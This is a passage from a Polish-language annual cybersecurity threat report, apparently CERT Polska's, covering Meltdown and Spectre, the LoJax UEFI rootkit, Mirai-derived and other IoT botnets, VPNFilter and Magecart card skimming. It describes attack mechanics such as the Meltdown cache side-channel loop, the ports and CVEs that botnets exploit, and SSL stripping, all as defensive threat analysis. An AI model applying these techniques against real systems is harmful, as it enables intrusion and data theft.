Rejestr rbx zawiera wskaźnik na naszą tablicę, która zostanie wykorzystana do eksfiltracji informacji techniką cache side channel. Instrukcja (1) powoduje wyzerowanie rejestru rax, po czym w pętli (2)(3) odczytujemy adres znajdujący się w pamięci kernela, dokonując dereferencji wskaźnika rcx. Odczytany bajt w rejestrze rax jest mnożony przez 4096 (3) i następuje dereferencja wskaźnika na rbx[rax]. Warunek (4) chroni przed odczytaniem wartości zero, ponieważ sukces ataku zależy od sytuacji wyścigu pomiędzy omawianym programem a procedurą obsługi wyjątków w procesorze. Niekiedy może zdarzyć się, że rejestr rax zostanie wyzerowany zanim dojdzie do jego wycieku, dlatego w kodzie ataku została umieszczona pętla.

Nowszewariantyataków

W późniejszych miesiącach 2018 r. ukazały się kolejne publikacje, prezentujące podobne koncepcyj-nie ataki, różniące się jednak implementacją:

• Speculative Store Bypass (Spectre v4; Spectre NG) - CVE-2018-3639• Rogue System Register Read (Spectre v3a, Spectre NG) - CVE-2018-3640• Lazy FP State Restore (Spectre NG) - CVE-2018-3665• Bounds Check Bypass Store (Spectre NG) - CVE-2018-3693

Pojawiły się również ataki nadużywające speculative execution w parze z Intel SGX (Software Guard Extensions; “enklawy”)74:

• L1 Terminal Fault: SGX (Foreshadow) - CVE-2018-3615• L1 Terminal Fault: OS/SMM (Foreshadow NG) - CVE-2018-3620• L1 Terminal Fault: VMM (Foreshadow NG) - CVE-2018-3646

Wpływpodatności

Ze względu na problemy związane z załataniem omawianych podatności w procesorach, producen-ci systemów operacyjnych, hiperwizorów, a także inne firmy (np. VMware) zostały powiadomione o Meltdownie i Spectre z kilkumiesięcznym wyprzedzeniem. Pozwoliło to na wprowadzenie w pro-duktach łatek zapobiegających.

72 https://lkml.org/lkml/2017/12/27/2 73 https://nvd.nist.gov/vuln/detail/CVE-2017-5754 74 mechanizm służący do ochrony wybranego kodu przed ujawnieniem i modyfikacją


Meltdown

Do tej pory systemy operacyjne podmapowywały w przestrzeni adresowej użytkownika również ad-resy wirtualne, należące do jądra systemu, co stanowiło optymalizację wydajnościową (tzn. zreduko-wanie narzutu na zmiany kontekstu). Obejściem problemu z Meltdownem było zredukowanie prze-strzeni adresów podmapowanych w przestrzeni użytkownika do niezbędnego minimum. Podobne rozwiązania wdrożono w systemach:• Linux: Kernel page-table isolation75

• Windows: Kernel ASLR/VA Isolation76

• MAC OS: “Double map”77

Rozwiązanie było krytykowane w związku z wprowadzanym przez nie dodatkowym narzutem wy-dajnościowym. Różnorodność wyników w pojawiających się badaniach sugerowała, że stopień spowolnienia komputera po zastosowaniu łatek bardzo mocno zależy od tego, jaki jest charakter wykonywanej na nim pracy. Według doniesień, największe spowolnienie odnotowano w przypadku serwerów bazodanowych i wynosił od 17 do 23 proc.78

Spectre

Możliwość uruchomienia ataku nawet z poziomu skryptów JavaScript działających w przeglądarce, była opisywana w publikacjach.79 Dlatego też w niektórych produktach wprowadzono łatki zapobiega-jące wykorzystywaniu podatności. Silnik JavaScript V8 został wzbogacony we flagę --untrusted-code-mitigations. Flaga powoduje włączenie dodatkowego maskowania adresów oraz indeksów w JIT-owanym kodzie, celem upewnienia się, że spekulatywne wykonanie nie odwołuje się do pa-mięci spoza wyznaczonego zakresu. Deklarowany spadek wydajności, związany z używaniem takiej łatki, może dochodzić nawet do około 15 proc.80 Dodatkowo, deweloperzy przeglądarek obniży-li rozdzielczość czasu zwracanego przez takie interfejsy jak performance.now(). Wyłączono także SharedArrayBuffer81, 82.

LoJax

We wrześniu 2018 r. firma ESET wydała obszerny raport83 na temat zaobserwowanego przez anali-tyków nowego zagrożenia związanego z metodą persystencji (pozostawania w zainfekowanym sys-temie), która używa rootkita działającego jako moduł UEFI.

UEFI to specyfikacja mechanizmu zarządzającego procesem uruchomienia komputera. Podobnie jak BIOS, UEFI działa ponad systemem operacyjnym i udostępnia mu usługi związane z dostę-pem do urządzeń. Rootkit to z kolei złośliwe oprogramowanie, które działa w sposób bardziej ukryty i z większymi uprawnieniami niż standardowe programy, zazwyczaj w postaci specjalnie przygotowanego modułu, bądź sterownika systemu operacyjnego. Rootkit UEFI wyróżnia się tym, że nie jest częścią systemu operacyjnego, a samej implementacji UEFI i fizycznie znajduje się w pamięci flash na płycie głównej komputera. Oznacza to, że nawet skasowanie wszystkich da-nych z dysku komputera albo jego całkowita wymiana nie spowoduje usunięcia tego typu złośli-wego oprogramowania.

75 https://lwn.net/Articles/738975/76 https://twitter.com/aionescu/status/93041252511129600077 https://twitter.com/aionescu/status/94860980954004684978 https://www.postgresql.org/message-id/[email protected] https://spectreattack.com/spectre.pdf (strona 7)80 https://v8.dev/docs/untrusted-code-mitigations 81 https://blogs.windows.com/msedgedev/2018/01/03/speculative-execution-mitigations-microsoft-edge-internet-explorer/ 82 https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/SharedArrayBuffer 83 https://cdn1.esetstatic.com/ESET/US/resources/datasheets/ESETus-datasheet-lojax.pdf


ESET przypomina, że znane są już przypadki istnienia rootkitów UEFI: “rkloader”, o którym wie-my z wycieku z włoskiej firmy HackingTeam, dostarczającej złośliwe oprogramowanie rządom zachodnich państw84, czy “darkmatter” używanego przez hakerów CIA85. Jednak do tej pory nie znaleziono potwierdzenia infekcji narzędziem tego typu.

Rysunek 56. Sposób działania persystencji LoJacka (źródło: ESET).

Sam sposób działania tego typu rootkitu nie musi być z natury złośliwy. Część producentów lapto-pów jako moduł UEFI instaluje mechanizm antykradzieżowy. Skuteczność tego typu mechanizmu zależy od kilku czynników: musi być on trudny do usunięcia lub wyłączenia oraz - najlepiej - jeżeli jest odporny na zmianę systemu operacyjnego czy nawet wymianę dysku. Przykładem takiego rozwią-zania jest LoJack (starsza nazwa: Computrace) zaimplementowany jako moduł UEFI/BIOS. Moduł aktywuje się przed każdym startem systemu Windows, kiedy podmienia jeden z jego kluczowych plików wykonywalnych. Kod uruchamia się na wczesnym etapie inicjalizacji systemu, upewnia się, że kolejny komponent rozwiązania jest zainstalowany w systemie operacyjnym, a następnie przy-wraca oryginalną zawartość pliku. W końcu, po uruchomieniu systemu operacyjnego, niewielki agent LoJacka pobiera (lub dokonuje aktualizacji) główny komponent z zapisanego w swoich zasobach adresu internetowego producenta rozwiązania.

W maju 2018 r. amerykańska firma Arbor Networks (produkująca urządzenia służące do analizy ruchu sieciowego) zidentyfikowała agenty LoJacka, które łączyły się z innymi domenami niż te ory-ginalne. Co więcej, były to domeny uprzednio używane przez grupę APT28 w jej kampaniach złośli-wego oprogramowania86. Modyfikacja adresu nie była trudna - wystarczyło, nawet ręcznie, zmienić kilkadziesiąt bajtów w pliku.

Badacze ESET-u nazwali zmodyfikowane agenty mianem “LoJax” i zaczęli szukać zainfekowanych komputerów. Oprócz agenta “LoJaxa”, na wielu maszynach znaleziono złośliwe oprogramowanie (albo ślady jego działania) typowe dla APT28: “SedUploader”, “XAgent” czy “Xtunnel”87, ale również kilka niestandardowych narzędzi. Wśród nich było narzędzie pozwalające uzyskać informacje na temat konkretnej implementacji UEFI w komputerze, narzędzie do tworzenia zrzutu pamięci UEFI, dodające do odczytanej pamięci dodatkowy moduł UEFI oraz ponowne jej zapisanie.

Prawidłowo wdrożone UEFI nie powinno pozwalać na dowolną zmianę swojej pamięci, zarówno ze względów na bezpieczeństwo użytkownika jak i przypadkowej modyfikacji, która mogłaby uszko-dzić komputer. Jednak okazuje się, że producenci w ogóle nie implementują zabezpieczeń, są one domyślnie wyłączone, zawierają błędy albo są możliwe do ominięcia. Narzędzie stworzone przez APT28 potrafi wykorzystać jedną z takich podatności88. Dalsza część infekcji przebiegała analo-gicznie do oryginalnej metody uzyskania persystencji przez LoJacka, jak na przedstawionym wyżej diagramie. Na końcu instalowane były standardowe trojany APT28.

84 https://blog.trendmicro.com/trendlabs-security-intelligence/hacking-team-uses-uefi-bios-rootkit-to-keep-rcs-9-agent-in-target-systems/85 https://wikileaks.org/ciav7p1/cms/page_13763820.html86 https://asert.arbornetworks.com/lojack-becomes-a-double-agent/87 https://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf88 https://bromiumlabs.files.wordpress.com/2015/01/speed_racer_whitepaper.pdf


Firma ESET zauważyła infekcje LoJaxem głównie na Bałkanach i w Europie Środkowo-Wschodniej. Jeden z niezależnych badaczy, sprawdzając dane statystyczne Cisco Umbrella IoC (Indicator of Compromise), podane przez ESET, stwierdził, że najwięcej infekcji było aktywnych w Polsce89.

Botnety IoT

Rynek inteligentnych urządzeń podłączanych masowo do internetu (ang. IoT, Internet of Things) rozwija się w bardzo szybkim tempie. Według niektórych źródeł90 w 2018 r. 2 z 5 urządzeń podłączo-nych do internetu stanowiły właśnie urządzenia IoT, co dawało imponującą liczbę 7 miliardów urzą-dzeń tego typu działających w sieci. Szacunkowo udział ten, jak również liczba wszystkich urządzeń z dostępem do globalnej sieci, ma się zwiększać w najbliższych latach w tempie ok. 10 proc. na rok. Można spotkać również opracowania prognozujące dużo bardziej dynamiczny trend91. Dodając do tego faktu odkrywane regularnie podatności, wykorzystanie domyślnych haseł administratora, panele administracyjne umożliwiające logowanie z każdego zakątka świata, czy brak aktualizacji firmware’u sprawiły, że drastycznie rosnąca skala przejętych urządzeń IoT bądź ich infekcji stała się codziennością dla branży bezpieczeństwa teleinformatycznego.

Botnety IoT nie są zjawiskiem, które pojawiło się na przestrzeni ostatnich 2-3 lat. Już kilka lat przed niesławnym Miraiem, który zyskał rozgłos w sierpniu 2016 r., pojawiały się botnety Aidra czy Ba-shlite, masowo infekujące urządzenia IoT. Celem ich działalności było wywoływanie ataków DDoS

89 http://archive.is/vBrWK90 https://iot-analytics.com/state-of-the-iot-update-q1-q2-2018-number-of-iot-devices-now-7b/91 https://www.statista.com/statistics/471264/iot-number-of-connected-devices-worldwide/

Rysunek 57. Mapa powiązań infrastruktury zarządzania LoJaxem (źródło: VirusTotal, IOC ESET).


na ogromną skalę. Część grup przestępczych, specjalizujących się właśnie w atakach blokujących usługi, dostrzegła potencjał drzemiący w kontrolowanych infrastrukturach, oferując usługi DDoS-as-a-Service. Dysponując kwotą ok. 20 USD miesięcznie, każdy może wydzierżawić część botnetu i przeprowadzić atak DDoS dla własnych potrzeb92. Obecnie ataki DDoS to tylko jeden ze sposobów nielegalnego wykorzystania botnetów IoT, o czym opowiemy w dalszej części raportu.

Mirai i jego warianty

Działalność botnetu Mirai była jednym z gorętszych tematów w świecie IT security w 2016 r., bardzo chętnie zresztą podchwytywanym przez media. Niedługo po odkryciu tego malware’u, bo już pod koniec września 2016 r., jego kod został upubliczniony, co poskutkowało pojawieniem się wkrótce nowych wariantów botnetu opartych, w mniejszym lub większym stopniu, na kodzie oryginalnego projektu. Do najgroźniejszych z nich należą zaobserwowany we wrześniu 2017 r. Reaper, wykorzy-stujący pakiet 9 eksploitów na podatności znalezione w urządzeniach różnych producentów oraz zidentyfikowany w grudniu 2017 r. Satori, którego celem były wybrane modele routerów Realtek oraz Huawei. Zainteresowanych metodą działania oryginalnego botnetu Mirai zapraszamy do lektury naszego raportu za 2017 r.

Do dziś powstały dziesiątki wariantów Miraia, część z nich o otwartym kodzie źródłowym. Zazwyczaj są one nazywane i klasyfikowane na podstawie nazwy gałęzi (ang. branch) projektu. Nazwa ta odno-si się do argumentu polecenia wywoływanego podczas infekcji, np. dla brancha MASUTA polecenie to wygląda następująco:

Do drugiej połowy czerwca 2018 r. zidentyfikowano 66 wariantów opartych na kodzie Miraia93, jed-nak wątpliwości jednego z użytkowników Twittera co do rzeczywistej liczby różnych mutacji zmo-tywowały researcherów z firmy Avast do porównania charakterystycznych elementów 7 wariantów tego malware’u w celu wyodrębnienia pewnych cech wspólnych94. Porównanie wykazało różnice w listach domyślnych danych uwierzytelniających zapisanych na stałe w kodzie malware’u, używa-nych podczas jednej z faz ataku. Niezgodności dotyczyły par login-hasło, zbieżności poszczególnych pozycji na liście z listą używaną przez oryginalny kod Miraia oraz długości samej listy. Inne odnale-zione rozbieżności pomiędzy wariantami były związane m.in. z kluczem używanym do deobfuskacji wspomnianej listy, rozszerzeniu listy tzw. kill portów95, jak również listy atakowanych architektur tj. Argonaut RISC Core czy Motorola RCE (a więc znowu - kolejnych urządzeń wspierających te ar-chitektury). Udało się zaobserwować, że nowe warianty Miraia czerpią korzyść przede wszystkim z modularnej budowy oryginalnego projektu, dzięki czemu dodawanie w kolejnych wersjach nowych funkcji, eksploitujących nowo definiowane zbiory podatności, jest stosunkowo proste.

Na szczególną uwagę zasługuje jeszcze jeden wariant Miraia - Sora, infekujący szeroki wachlarz urządzeń opartych na rozmaitych architekturach sprzętowych. Kod Sory został skompilowany przy użyciu narzędzi z projektu Aboriginal Linux96, który umożliwia łatwe tworzenie plików wykonywal-nych, uruchamianych na różnych platformach, co znacznie poszerzyło zbiór urządzeń IoT będących potencjalnym celem botnetu97.

92 https://blog.radware.com/uncategorized/2018/03/history-of-iot-botnets/93 https://twitter.com/rommeljoven17/status/101006087010004992094 https://blog.avast.com/hacker-creates-seven-new-variants-of-the-mirai-botnet95 usług nasłuchujących na danym urządzeniu, np. SSH, Telnet, które malware IoT zamyka w celu uniemożliwienia podłączenia się właścicielowi urządzenia, a także innym rodzinom złośliwego oprogramowania, eliminując w ten sposób ewentualną konkurencję.96 https://github.com/landley/aboriginal97 https://www.symantec.com/blogs/threat-intelligence/mirai-cross-platform-infection

$ /bin/busybox MASUTAMASUTA: applet not found


Rysunek 58. Najpopularniejsze gałęzie Miraia, stan na czerwiec 2018 r. (źródło: https://twitter.com/rommeljoven17/sta-tus/1010060870100049920).

Hide’n’Seek

Ciekawymi cechami wyróżnia się inne zagrożenie - odkryty przez BitDefender w styczniu 2018 r. botnet Hide’n’Seek, któremu już w pierwszych dniach działalności udało się zainfekować przeszło 90 000 urządzeń98. Według tego samego źródła, na początku października 2018 r. liczba zainfeko-wanych urządzeń osiągnęła pułap 300 000, a średnia dobowa liczba aktywnych botów w tym okresie oscylowała na poziomie 4 000 - 5 00099.

Najważniejszym rozwiązaniem użytym w konstrukcji botnetu Hide’n’Seek jest wykorzystanie zde-centralizowanej architektury P2P (ang. peer-to-peer). Nie jest to nowy pomysł, ponieważ podobnie został zaprojektowany także botnet Hajime, opisywany przez CERT Polska w poprzednim rapor-cie100. Interesującą kwestią jest zapisana na stałe w kodzie lista peerów, z którymi łączy się oprogra-mowanie. Najwięcej spośród nich zostało zlokalizowanych w Korei Południowej, Chinach oraz USA. Zidentyfikowano również kilka adresów z polskich sieci. Protokół P2P służy do propagacji botnetu, wymiany plików pomiędzy zainfekowanymi urządzeniami oraz przesyłania na nie aktualizacji mal-ware’u.

Drugi najważniejszy komponent Hide’n’Seeka to działający podobnie jak w Miraiu skaner, posługują-cy się losowo generowanymi adresami IP oraz predefiniowaną listą portów. Używane są one w celu określenia dostępnych na atakowanym urządzeniu usług i możliwości ich wykorzystania w celu jego przejęcia.

Porty Usługa Podejmowana akcja

23, 2323 Telnet Atak bruteforce z wykorzystaniem listy danych uwierzytelniających (login-hasło)

80, 8080 HTTP Użycie powszechnie dostępnych eksploitów na usługi

5555 ADB Próba przejęcia urządzenia poprzez otwarty na świat interfejs ADB (ang. Android Debug Bridge)

2480 OrientDB Wykorzystanie podatności RCE (CVE-2017-11467101)

5984 CouchDB Wykorzystanie podatności RCE (CVE-2017-12636102)

Tabela 7. Lista skanowanych przez Hide’n’Seek portów oraz podejmowanych akcji w zależności od usługi.

98 https://labs.bitdefender.com/2018/09/hide-and-seek-iot-botnet-learns-new-tricks-uses-adb-over-internet-to-exploit-thousands-of-android-devices/99 https://www.youtube.com/watch?v=d2-2VRxBqEA&t=22m28s100 https://www.cert.pl/PDF/Raport_CP_2017.pdf101 https://www.cvedetails.com/cve/CVE-2017-11467/102 https://www.cvedetails.com/cve/CVE-2017-12636/


Na uwagę zasługuje modularna budowa malware’u. Zaraz po zainfekowaniu Hide’n’Seek nie posia-da załadowanych konkretnych eksploitów. Zbiera natomiast szczegółowe informacje o urządzeniu, na podstawie których są następnie pobierane odpowiednie moduły skompilowane pod konkretną architekturę (m.in. x86, ARM czy MIPS). Hide’n’Seek przechowuje je w pamięci urządzenia, dlatego wykonując jej zrzut można stwierdzić, jakie moduły zostały ściągnięte przez malware. Przykładem może być cpuminer, zamieniający urządzenie IoT w koparkę kryptowalut. Mimo, że nie jest to popu-larne rozwiązanie, ze względu na małą moc obliczeniową urządzeń IoT, świetnie obrazuje kierunek, w którym zmierzają botnety IoT. Cryptomining, dystrybucja ransomware’u czy fraudy to oprócz ata-ków DDoS kolejne przykłady do czego można wykorzystać botnet oparty o urządzenia IoT.

Torii

W drugiej połowie września 2018 r. został zaobserwowany nowy rodzaj malware’u na urządzenia IoT - Torii. Informacja, skąd jest inicjowany ruch sieciowy na port 23 (znany scenariusz z użyciem domyślnych danych uwierzytelniających), jest ukrywana poprzez wykorzystanie węzłów sieci Tor. Stąd właśnie pochodzi nazwa oprogramowania. Specjaliści z firmy Avast, którzy dokładnie przeana-lizowali działanie nowego zagrożenia, doszli do wniosku, że botnet mógł działać już dużo wcześniej, nawet od grudnia 2017 r.103 Podobnie jak w przypadku wcześniej omawianych rozwiązań, Torii posia-da modularną budowę, a także wersje dostępne na różne platformy (m.in. x86, x86_64, MIPS, ARM, PowerPC oraz SuperH) wykorzystujące łącznie ponad 100 złośliwych modułów, gotowych do użycia w zależności od atakowanej architektury104.

Torii jest nie tylko trudny do wykrycia, ale i usunięcia. Został wyposażony w sześć mechanizmów persystencji, wykorzystywanych jednocześnie w celu zmaksymalizowania możliwości przetrwania i zapewnienia ciągłości działania malware’u na zainfekowanym urządzeniu105. Kolejnymi ciekawymi rozwiązaniami, które zastosował autor Torii, jest napisany w języku Go uniwersalny moduł do wy-konania dowolnej komendy na urządzeniu, szyfrowanie komunikacji z C&C, czy możliwość wypro-wadzania wrażliwych danych i przesyłania ich do serwera C&C. I właśnie to ostatnie rozwiązanie stanowi, według researcherów z firmy Avast, główny cel działania Torii, zdecydowanie odróżniając go od pozostałych botnetów IoT.

Omawiany malware stanowi pewną ewolucję i swego rodzaju kolejny poziom w rozwoju oprogra-mowania atakującego urządzenia IoT. Torii nie jest oparty na kodzie Miraia, przez co działa nieco inaczej. Przykładem może być brak generatora losowych adresów IP, służącego do wyboru następ-nych celów pod kątem możliwości infekcji i propagacji. Dzięki temu Torii stara się działać jak najmniej zauważalnie w warstwie sieciowej, ukrywając fakt infekcji urządzenia i potajemnie realizując cele właściciela botnetu.

Sytuacja w Polsce

Podobnie jak 2017 r., również 2018 r. nie przyniósł zmasowanych ataków na urządzenia IoT w polskich sieciach. Nie zaobserwowaliśmy wielu infekcji, a te które wystąpiły, dotyczyły głównie przejętych routerów (najczęściej Mikrotik lub TP-Link). Zazwyczaj atakującym oprogramowaniem była jedna z odmian Miraia. W części zainfekowanych urządzeń udało się rozwiązać problem dzięki temu, że wielu dostawców internetu szybko i z należytą powagą potraktowało ostrzeżenia dotyczące malware’u IoT, wysyłane przez nasz zespół do odpowiednich zespołów abuse.

Zespół CERT Polska wciąż jest na etapie rozwijania i doskonalenia narzędzi dotyczących obserwacji i powiadamiania o urządzeniach IoT, które mogły zostać przejęte i włączone jako element infra-struktury któregoś z botnetów IoT. Nie ma miesiąca, aby nie docierały do nas informacje o nowych zagrożeniach do których na bieżąco adaptujemy nasze systemy, aby jak najlepiej i jak najszybciej ostrzegać polskich użytkowników internetu. Na koniec przedstawiamy tabelę 8, która ujmuje śred-

103 https://blog.avast.com/new-torii-botnet-threat-research104 https://the-parallax.com/2018/09/28/new-botnet-torii-iot-abuse/105 https://blog.avast.com/new-torii-botnet-threat-research


nią liczbę botów Miraia w polskich sieciach (niezależnie od rodziny), obserwowanych przez zespół CERT Polska w poszczególnych miesiącach 2018 r. Średnia miesięczna liczba aktywnych botów utrzymywała się mniej więcej na poziomie poniżej 1 000 i jest to stały pułap, obserwowany od połowy 2017 r.

Miesiąc Średnia dzienna liczba aktywnych botów w PL

Styczeń 818

Luty 895

Marzec 829

Kwiecień 768

Maj 791

Czerwiec 1 117

Lipiec 946

Sierpień 918

Wrzesień 1 036

Październik 1 171

Listopad 1 074

Grudzień 896

Średnia liczba w ujęciu miesięcznym 938

Tabela 8. Średnia dzienna liczba botów Miraia (wszystkie rodziny) w polskich sieciach w ujęciu miesięcznym.

Miesiąc

1 2 3 4 5 6 7 8 9 10 11 12

1400

1200

1000

800

600

400

200

0

Śred

nia

dzie

nna

liczb

a bo

tów

Wykres 4. Średnia dzienna liczba botów Miraia (wszystkie rodziny) w polskich sieciach w ujęciu miesięcznym.


Podsumowanie

Szybko rosnący rynek urządzeń IoT stwarza wiele okazji do nadużyć. Po pierwsze, urządzenia IoT to nierzadko “nisko wiszące owoce” (ang. low-hanging fruits) w hierarchii atakowanych celów, co pozwala na wykorzystanie luk nawet przez atakujących o niewielkich umiejętnościach. Z powodu niskiego standardu bezpieczeństwa są stosunkowo łatwe do eksploitacji i przejęcia.

Wiele urządzeń IoT (np. kamery IP, routery czy termostaty) działa praktycznie bez przerwy. Są rzad-ko monitorowane, a zainteresowanie właściciela ich utrzymaniem kończy się w momencie podłącze-nia urządzenia do sieci. Dlatego też stanowią łakomy kąsek dla osoby o złych intencjach. Poza tym koszt przejęcia urządzenia IoT jest znacznie niższy, niż koszt i nakład pracy potrzebny do przejęcia dobrze zabezpieczonego serwera. A przecież np. w celu przeprowadzenia ataku DDoS, trzeba naj-pierw mieć możliwość zbudowania i kontroli pewnej infrastruktury, złożonej z wielu takich elementów.

Z drugiej strony, niektórzy eksperci z firm analizujących malware IoT przewidują, że rozwój tego segmentu złośliwego oprogramowania będzie podążał w stronę coraz bardziej wyrafinowanych, mo-dularnych rozwiązań, możliwych do konfiguracji w locie w celu dostosowania funkcjonalności pod kątem różnych rodzajów ataków106. Niektórzy twierdzą ponadto, że trend będzie ewoluował w stronę urządzeń o coraz większej mocy obliczeniowej, aby zaprząc je do realizacji zadań, które jej wyma-gają, np. do kopania kryptowalut.

Pozostaje pytanie, czy da się zmienić obecny obraz sytuacji, albo chociaż w jakimś stopniu zmniej-szyć bądź zahamować liczbę infekcji? Być może, wobec pasywnej postawy producentów urządzeń IoT w kwestii choćby aktualizacji firmware’u, rozwiązaniem mogłyby być regulacje prawne. Dobrym przykładem może być lokalne prawo stanu Kalifornia, przyjęte we wrześniu 2018 r. Prawo to nakła-da na producentów urządzeń sprzedawanych i podłączanych do sieci w tamtym rejonie obowiązek używania unikalnego inicjalnego hasła dla każdego egzemplarza (nadanego przez producenta lub wybieranego przez użytkownika)107. Inne proponowane regulacje prawne, które można by wprowa-dzić, to np. określenie daty ważności firmware’u, aby użytkownik wiedział, do kiedy może liczyć na wsparcie producenta, czy choćby udostępnienie dokumentacji lub zapewnienie możliwości samo-dzielnej aktualizacji albo wgrania alternatywnego oprogramowania na urządzenie, już po zakończe-niu okresu wsparcia przez producenta. Czas pokaże, czy tego typu rozwiązania przyczynią się do zwiększenia bezpieczeństwa w dynamicznie rozwijającym się świecie urządzeń IoT.

VPNFilter

Zespół Cisco Talos, zajmujący się analityką zaawansowanych zagrożeń, w połowie 2018 r. opubli-kował informację o nowym rodzaju złośliwego oprogramowania, atakującym urządzenia sieciowe SOHO (Small Office, Home Office). Pierwsze statystyki były niepokojące: zainfekowano co najmniej pół miliona urządzeń w 54 krajach108. Celem ataku był sprzęt firm ASUS, D-Link, Huawei, Linksys,

106 https://blog.avast.com/iot-predictions107 https://leginfo.legislature.ca.gov/faces/billTextClient.xhtml?bill_id=201720180SB327108 https://blog.talosintelligence.com/2018/05/VPNFilter.html


Mikrotik, Netgear, TP-Link, Ubiquiti, UPVEL, QNAP oraz ZTE. Interesujące, że cyberprzestępcy wy-korzystujący VPNFilter utrzymywali dwie infrastruktury: pierwszą przeznaczoną tylko do przejętych urządzeń na terenie Ukrainy oraz drugą - dla reszty świata. Badanie kodu ujawniło podobieństwa z malware’m wykorzystywanym przez grupę BlackEnergy109. Niestety, nie są znane szczegóły uzyska-nia wstępnego dostępu do urządzeń - prawdopodobnym wektorem są publicznie znane podatności na urządzenia w/w producentów.

Atak na urządzenie składał się z trzech etapów: pierwszy krok służył zapewnieniu persystencji na urządzeniu oraz pobraniu pliku wykonywalnego etapu drugiego - jak w klasycznym loaderze. Mody-fikacja pamięci NVRAM oraz wpis do crontaba zapewniały dostępność malware’u po restarcie.

Loader przygotowano w wersjach pod różne architektury sprzętowe. Deweloperzy malware’u w cie-kawy sposób zapewnili aktualizację list serwerów Command & Control (C2): zainfekowane urządze-nie pobierało zdjęcie z serwisu Photobucket, które w danych EXIF zawierało informację o lokalizacji zrobienia zdjęcia, będącą w rzeczywistości adresem IP. Jeżeli operacja nie zakończyła się powo-dzeniem, wówczas obrazek był pobierany z dedykowanej domeny. Aby mieć pewność komunikacji z urządzeniem, atakujący dodali jeszcze jeden mechanizm na wypadek, gdy opisane wyżej sposoby zawiodą: otwarcie portu i nasłuchiwanie komunikatu o odpowiedniej treści.

Zainfekowane urządzenia skanowały sieć pod kątem otwartych portów 23, 80, 2000 oraz 8080, celem dalszej propagacji infekcji na urządzeniach producentów Mikrotik oraz QNAP. Komunikacja z serwerami zarządzającymi odbywała się poprzez sieć Tor. Właściwe złośliwe oprogramowanie pobrane przez loader, umożliwiało wykonywanie dostarczonych poleceń, uszkodzenie urządzenia poprzez wyzerowanie krytycznych obszarów pamięci firmware oraz pobieranie plików z dostarczo-nego adresu URL. Również nazwa rodziny malware’u wzięła się z operacji przeprowadzanych w tym etapie, a dokładniej - tworzenia roboczych folderów w lokalizacjach: /var/run/vpnfilterm oraz /var/run/vpnfilterw.

Złośliwe oprogramowanie swoje funkcjonalności implementowało w modułach. Najciekawszymi z nich był ssler, którego zadaniem było wstrzykiwanie kodu JavaScript w ruch na porcie 80 oraz pozyskiwanie z niego danych. Napastnik mógł zdefiniować cele ataków w postaci adresów URL oraz zrzucać z nich pełen ruch w postaci pliku binarnego. Komponent umożliwiał też SSL Stripping, czyli podmianę z https:// na http:// we wszystkich żądaniach o zasoby. Umożliwiało to odczyt komunika-cji pomiędzy użytkownikiem a serwerem (która w założeniu miała być zaszyfrowana) i pozyskanie wrażliwych danych. Przestępcy szczególną uwagę przywiązywali do żądań POST wysyłanych do accounts.google.com, które były zrzucane niezależnie od definicji celów ataku.

Przechwytywanie ruchu sieciowego do serwisów webowych, wykorzystywanych w codziennej pra-cy, było tylko dodatkiem do modułu o nazwie ps, specjalizowanego pod kątem pozyskiwania ruchu protokołu Modbus, wykorzystywanego w środowiskach automatyki przemysłowej. Z założenia ten sposób komunikacji nie jest szyfrowany i wspiera jedynie podstawowe metody uwierzytelniania. Nie wiadomo, czy działalność VPNFilter skupiała się tylko na pozyskiwaniu ruchu, a nie interakcji z urzą-dzeniami wykorzystującymi Modbus.

Po wakacjach Talos podzielił się dodatkowymi informacjami na temat kolejnych modułów odkrytych podczas ataków:• htpx - przekierowywanie oraz inspekcja ruchu HTTP• ndbr - klient SSH• nm - skaner sieciowy• netfilter - moduł służący do przeprowadzania ataków DDoS• portforwarding - przekierowywanie ruchu sieciowego do serwerów będących pod kontrolą

botmastera• socks5proxy - funkcjonalność proxy SOCKS5 na urządzeniu• tcpvpn - VPN poprzez połączenie zwrotne TCP

109 https://en.wikipedia.org/wiki/BlackEnergy110 https://pl.wikipedia.org/wiki/Exchangeable_Image_File_Format


Działanie VPNFilter zostało znacząco ograniczone poprzez blokowanie domen oraz adresów IP infrastruktury należącej do przestępców. Stopień skomplikowania złośliwego oprogramowania, infra-struktury, funkcjonalność modułów oraz skala infekcji wskazują na wysoce zmotywowanego aktora, potencjalnie działającego na zlecenie służb specjalnych.

Magecart

Kradzieże kart płatniczych są jednym z najczęściej popełnianych przestępstw elektronicznych. Przestępca nie musi dokonywać fizycznej kradzieży. Wystarczy, że skopiuje zdalnie zawartość pa-ska magnetycznego lub chipu karty i tym sposobem zdobędzie informacje potrzebne do dokonania transakcji.

Urządzenia pozwalające na wydobycie danych z karty nazywane są skimmerami. Standardowo montuje się je w bankomatach jako nakładkę na slot, do którego wsuwane są karty. W celu ustalenia pinu, przestępcy dodatkowo montują nakładki na klawiatury pinpad lub odpowiednio wykadrowane, ukryte kamery.

Odróżnienie tego typu urządzenia od oryginalnego wyposażenia maszyny jest bardzo trudne.

Rysunek 59. Fizyczny skimmer bankomatowy. (Fot. Northwest Community Credit Union)

Inną popularną metodą pozyskiwania danych jest użycie złośliwego oprogramowania, którym in-fekowane są komputery lub urządzenia mobilne. Malware tego typu może zapisywać informacje o wciśniętych klawiszach, przechwytywać dane wprowadzone do formularzy osadzonych na stronach internetowych lub stale przeczesywać pamięć podręczną w poszukiwaniu ciągów odpowiadającym numerom kart.


Obie metody nie są jednak doskonałe. Z jednego przejętego komputera przestępca nie jest w stanie pozyskać więcej niż kilku kart. Realny stosunek wykradzionych rekordów do ilości zainfekowanych stacji roboczych wynosi znacznie poniżej 1. Wynika to z m.in. faktu krótkiego życia złośliwego opro-gramowania - w okresie od infekcji do neutralizacji zagrożenia, ofiara może nie mieć potrzeby uży-wać karty. Sam proces infekcji jest czasochłonny i cały czas trzeba go udoskonalać.

Z kolei ataki na bankomaty dają możliwości większego zarobku. Oprócz nowoczesnych zabezpie-czeń stosowanych w kartach i dziesiątków metod wykrywania skimmerów, kradzież jest trudna do zrealizowania z jeszcze jednego powodu: konieczności fizycznej interakcji z bankomatem. Przestęp-ca musi opuścić swoją strefę komfortu - cyfrowy świat, w którym czuje się bezpiecznie. Urządzenie trzeba zainstalować, a także zależnie od sposobu działania, po pewnym czasie przenieść zapisane na nim dane na inny nośnik.

